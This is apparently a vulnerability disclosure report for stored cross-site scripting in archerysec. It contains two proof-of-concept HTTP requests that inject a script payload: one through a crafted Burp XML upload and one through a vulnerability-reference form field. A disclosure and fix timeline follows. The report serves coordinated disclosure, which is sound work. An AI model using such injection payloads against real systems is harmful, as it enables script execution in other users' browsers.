Cross-site Scripting (XSS) - Stored in archerysec/archerysec

Valid

Reported on

Oct 20th 2021


Description

The application is vulnerable to a Stored XSS attack.

It is possible for an authenticated user to inject a JavaScript payload that will be executed in the web browser of the users viewing the concerned pages.

When uploading a Burp scan, the XML field "issueBackground" of a vulnerability is not sanitized before being stored in the database. It is returned unchanged as a "description" of the vulnerability.

Proof of Concept

POST /report-upload/upload/ HTTP/1.1
Host: 0.0.0.0:8000
Content-Length: 8194
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://0.0.0.0:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRfZMUQMkH0VF1JMi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://0.0.0.0:8000/report-upload/upload/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=pbh0qzX8rDZYAsCWjWTK2mg2myW7En7UL0SMxXd4ZiUpee4qAuMv7ZBQ8KS74f2e; sessionid=3cpylcnskvsbqep22w86llsa7ql9ms16
Connection: close

------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="csrfmiddlewaretoken"

td5JH8qaMzhXVqz3W2IDRjzTbGRFyNeSP2GvOwG6kecozc1xdABoWWUHXSNFYF9c
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="project_id"

7636a614-c166-461a-a09e-cf0c07b44f91
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="scanner"

burp_scan
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="target"

test
------WebKitFormBoundaryRfZMUQMkH0VF1JMi
Content-Disposition: form-data; name="file"; filename="poc.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE issues [
<!ELEMENT issues (issue*)>
<!ATTLIST issues burpVersion CDATA "">
<!ATTLIST issues exportTime CDATA "">
<!ELEMENT issue (serialNumber, type, name, host, path, location, severity, confidence, issueBackground?, remediationBackground?, references?, vulnerabilityClassifications?, issueDetail?, issueDetailItems?, remediationDetail?, requestresponse*, collaboratorEvent*, infiltratorEvent*, staticAnalysis*, dynamicAnalysis*)>
<!ELEMENT serialNumber (#PCDATA)>
<!ELEMENT type (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT path (#PCDATA)>
<!ELEMENT location (#PCDATA)>
<!ELEMENT severity (#PCDATA)>
<!ELEMENT confidence (#PCDATA)>
<!ELEMENT issueBackground (#PCDATA)>
<!ELEMENT remediationBackground (#PCDATA)>
<!ELEMENT references (#PCDATA)>
<!ELEMENT vulnerabilityClassifications (#PCDATA)>
<!ELEMENT issueDetail (#PCDATA)>
<!ELEMENT issueDetailItems (issueDetailItem*)>
<!ELEMENT issueDetailItem (#PCDATA)>
<!ELEMENT remediationDetail (#PCDATA)>
<!ELEMENT requestresponse (request?, response?, responseRedirected?)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request method CDATA "">
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT responseRedirected (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT message (#PCDATA)>
<!ELEMENT conversation (#PCDATA)>
<!ELEMENT recipient (#PCDATA)>
<!ELEMENT recipients (recipient*)>
<!ELEMENT smtp (sender, recipients, message, conversation)>
<!ELEMENT collaboratorEvent (interactionType, originIp, time, lookupType?, lookupHost?, requestresponse?, smtp?)>
<!ELEMENT interactionType (#PCDATA)>
<!ELEMENT originIp (#PCDATA)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT lookupType (#PCDATA)>
<!ELEMENT lookupHost (#PCDATA)>
<!ELEMENT infiltratorEvent (parameterName, platform, signature, stackTrace?, parameterValue?, collaboratorEvent)>
<!ELEMENT parameterName (#PCDATA)>
<!ELEMENT platform (#PCDATA)>
<!ELEMENT signature (#PCDATA)>
<!ELEMENT stackTrace (#PCDATA)>
<!ELEMENT parameterValue (#PCDATA)>
<!ELEMENT dynamicAnalysis (source, sink, sourceStackTrace, sinkStackTrace, eventListenerStackTrace, sourceValue, sinkValue, eventHandlerData, eventHandlerDataType, eventHandlerManipulatedData, poc, origin, isOriginChecked, sourceElementId, sourceElementName, eventFiredEventName, eventFiredElementId, eventFiredElementName, eventFiredOuterHtml)>
<!ELEMENT staticAnalysis (source, sink, codeSnippets)>
<!ELEMENT source (#PCDATA)>
<!ELEMENT sink (#PCDATA)>
<!ELEMENT sourceStackTrace (#PCDATA)>
<!ELEMENT sinkStackTrace (#PCDATA)>
<!ELEMENT eventListenerStackTrace (#PCDATA)>
<!ELEMENT sourceValue (#PCDATA)>
<!ELEMENT sinkValue (#PCDATA)>
<!ELEMENT eventHandlerData (#PCDATA)>
<!ELEMENT eventHandlerDataType (#PCDATA)>
<!ELEMENT sourceElementId (#PCDATA)>
<!ELEMENT sourceElementName (#PCDATA)>
<!ELEMENT eventFiredEventName (#PCDATA)>
<!ELEMENT eventFiredElementId (#PCDATA)>
<!ELEMENT eventFiredElementName (#PCDATA)>
<!ELEMENT eventFiredOuterHtml (#PCDATA)>
<!ELEMENT eventHandlerManipulatedData (#PCDATA)>
<!ELEMENT poc (#PCDATA)>
<!ELEMENT origin (#PCDATA)>
<!ELEMENT isOriginChecked (#PCDATA)>
<!ELEMENT codeSnippets (codeSnippet*)>
<!ELEMENT codeSnippet (#PCDATA)>
]>
<issues burpVersion="2021.8.4" exportTime="Wed Oct 20 14:17:19 CEST 2021">
  <issue>
    <serialNumber>859448131531424768</serialNumber>
    <type>5245344</type>
    <name><![CDATA[aaaaa]]></name>
    <host ip="93.32.21.34">http://example.com</host>
    <path><![CDATA[/]]></path>
    <location><![CDATA[/]]></location>
    <severity>Information</severity>
    <confidence>Firm</confidence>
    <issueBackground><![CDATA[<p>aaa<script>alert(1)</script> </p>]]></issueBackground>
    <remediationBackground><![CDATA[<p>aaa</p>]]></remediationBackground>
    <references><![CDATA[<ul>
    <li><a href="https://portswigger.net/web-security/clickjacking">Web Security Academy: Clickjacking</a></li>
    <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options">X-Frame-Options</a></li>
</ul>]]></references>
    <vulnerabilityClassifications><![CDATA[<ul>
<li><a href="https://cwe.mitre.org/data/definitions/693.html">CWE-693: Protection Mechanism Failure</a></li>
    <li><a href="https://capec.mitre.org/data/definitions/103.html">CAPEC-103: Clickjacking</a></li>
</ul>]]></vulnerabilityClassifications>
    <requestresponse>
      <request method="GET" base64="true"><![CDATA[R0VUIC8gSFRUUC8xLjENCkhvc3Q6IGV4YW1wbGUuY29tDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IFBpeGVsIDNhKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOTIuMC40NTE1LjE1OSBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjkNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBmci1GUixmcjtxPTAuOSxlbi1VUztxPTAuOCxlbjtxPTAuNw0KQ29ubmVjdGlvbjogY2xvc2UNCg0K]]></request>
      <response base64="true"><![CDATA[SFRUUC8xLjEgMjAwIE9LDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KQWdlOiAzMTUxNDANCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9NjA0ODAwDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOA0KRGF0ZTogTW9uLCAxOCBPY3QgMjAyMSAxNToxMjozNiBHTVQNCkV0YWc6ICIzMTQ3NTI2OTQ3Ig0KRXhwaXJlczogTW9uLCAyNSBPY3QgMjAyMSAxNToxMjozNiBHTVQNCkxhc3QtTW9kaWZpZWQ6IFRodSwgMTcgT2N0IDIwMTkgMDc6MTg6MjYgR01UDQpTZXJ2ZXI6IEVDUyAoZGNiLzdGNUMpDQpWYXJ5OiBBY2NlcHQtRW5jb2RpbmcNClgtQ2FjaGU6IEhJVA0KQ29udGVudC1MZW5ndGg6IDEyNTYNCkNvbm5lY3Rpb246IGNsb3NlDQoNCjwhZG9jdHlwZSBodG1sPgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RXhhbXBsZSBEb21haW48L3RpdGxlPgoKICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04IiAvPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEiIC8+CiAgICA8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgogICAgYm9keSB7CiAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2YwZjBmMjsKICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgcGFkZGluZzogMDsKICAgICAgICBmb250LWZhbWlseTogLWFwcGxlLXN5c3RlbSwgc3lzdGVtLXVpLCBCbGlua01hY1N5c3RlbUZvbnQsICJTZWdvZSBVSSIsICJPcGVuIFNhbnMiLCAiSGVsdmV0aWNhIE5ldWUiLCBIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmOwogICAgICAgIAogICAgfQogICAgZGl2IHsKICAgICAgICB3aWR0aDogNjAwcHg7CiAgICAgICAgbWFyZ2luOiA1ZW0gYXV0bzsKICAgICAgICBwYWRkaW5nOiAyZW07CiAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZkZmRmZjsKICAgICAgICBib3JkZXItcmFkaXVzOiAwLjVlbTsKICAgICAgICBib3gtc2hhZG93OiAycHggM3B4IDdweCAycHggcmdiYSgwLDAsMCwwLjAyKTsKICAgIH0KICAgIGE6bGluaywgYTp2aXNpdGVkIHsKICAgICAgICBjb2xvcjogIzM4NDg4ZjsKICAgICAgICB0ZXh0LWRlY29yYXRpb246IG5vbmU7CiAgICB9CiAgICBAbWVkaWEgKG1heC13aWR0aDogNzAwcHgpIHsKICAgICAgICBkaXYgewogICAgICAgICAgICBtYXJnaW46IDAgYXV0bzsKICAgICAgICAgICAgd2lkdGg6IGF1dG87CiAgICAgICAgfQogICAgfQogICAgPC9zdHlsZT4gICAgCjwvaGVhZD4KCjxib2R5Pgo8ZGl2PgogICAgPGgxPkV4YW1wbGUgRG9tYWluPC9oMT4KICAgIDxwPlRoaXMgZG9tYWluIGlzIGZvciB1c2UgaW4gaWxsdXN0cmF0aXZlIGV4YW1wbGVzIGluIGRvY3VtZW50cy4gWW91IG1heSB1c2UgdGhpcwogICAgZG9tYWluIGluIGxpdGVyYXR1cmUgd2l0aG91dCBwcmlvciBjb29yZGluYXRpb24gb3IgYXNraW5nIGZvciBwZXJtaXNzaW9uLjwvcD4KICAgIDxwPjxhIGhyZWY9Imh0dHBzOi8vd3d3LmlhbmEub3JnL2RvbWFpbnMvZXhhbXBsZSI+TW9yZSBpbmZvcm1hdGlvbi4uLjwvYT48L3A+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4K]]></response>
      <responseRedirected>false</responseRedirected>
    </requestresponse>
  </issue>
</issues>

------WebKitFormBoundaryRfZMUQMkH0VF1JMi--

Impact

An attacker is able to execute JavaScript in the browser of the user consulting affected vulnerability.

Occurences

Description

The application is vulnerable to a Stored XSS attack.

It is possible for an authenticated user to inject a JavaScript payload that will be executed in the web browser of the users viewing the concerned pages.

When adding a vulnerability in Pentest Activity > Pentest List > Add vulnerability, the field "vuln_reference" of a vulnerability is not sanitized before being stored in the database. It is returned unchanged as a "reference" of the vulnerability.

Proof of Concept

POST /pentest/add_vuln/ HTTP/1.1
Host: 0.0.0.0:8000
Content-Length: 1471
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://0.0.0.0:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMGFjqlpqq5ANGLQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://0.0.0.0:8000/pentest/add_new_vuln/?scan_id=2cf9d567-b883-4c69-ac1c-235591c329da&vuln_id=29fcf20a-af79-40d7-9b6f-425666060e9c&project_id=7636a614-c166-461a-a09e-cf0c07b44f91
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=pbh0qzX8rDZYAsCWjWTK2mg2myW7En7UL0SMxXd4ZiUpee4qAuMv7ZBQ8KS74f2e; sessionid=3cpylcnskvsbqep22w86llsa7ql9ms16
Connection: close

------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="csrfmiddlewaretoken"

LkgYD7QlBBYSeb3hlkqGR3a8fHOE6xNB79RKKv6h9gTjSXvLCSjrWGvW1TKEwpIV
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="scan_id"

2cf9d567-b883-4c69-ac1c-235591c329da
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="project_id"

7636a614-c166-461a-a09e-cf0c07b44f91
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_name"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_severity"

High
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="pentest_type"

web
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_instance"


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_description"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_solution"

aaa
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="vuln_reference"

payload: <script>alert(1)</script>
------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="poc_description"


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ
Content-Disposition: form-data; name="poc"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAMGFjqlpqq5ANGLQ--

Impact

An attacker is able to execute JavaScript in the browser of the user consulting affected vulnerability.

References

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Guillaume GRABÉ modified their report
a month ago
Guillaume GRABÉ modified their report
a month ago
Guillaume GRABÉ modified their report
a month ago
We have contacted a member of the archerysec team and are waiting to hear back a month ago
We have sent a follow up to the archerysec team. We will try again in 7 days. a month ago
We have sent a second follow up to the archerysec team. We will try again in 10 days. a month ago
Anand Tiwari validated this vulnerability a month ago
Guillaume GRABÉ has been awarded the disclosure bounty
The fix bounty is now up for grabs
Anand Tiwari
a month ago

Maintainer


Thanks for reporting to us. We'll apply a fix soon.

Anand Tiwari confirmed that a fix has been merged on 793e94 9 days ago
Anand Tiwari has been awarded the fix bounty
manual_vuln_data.html#L79 has been validated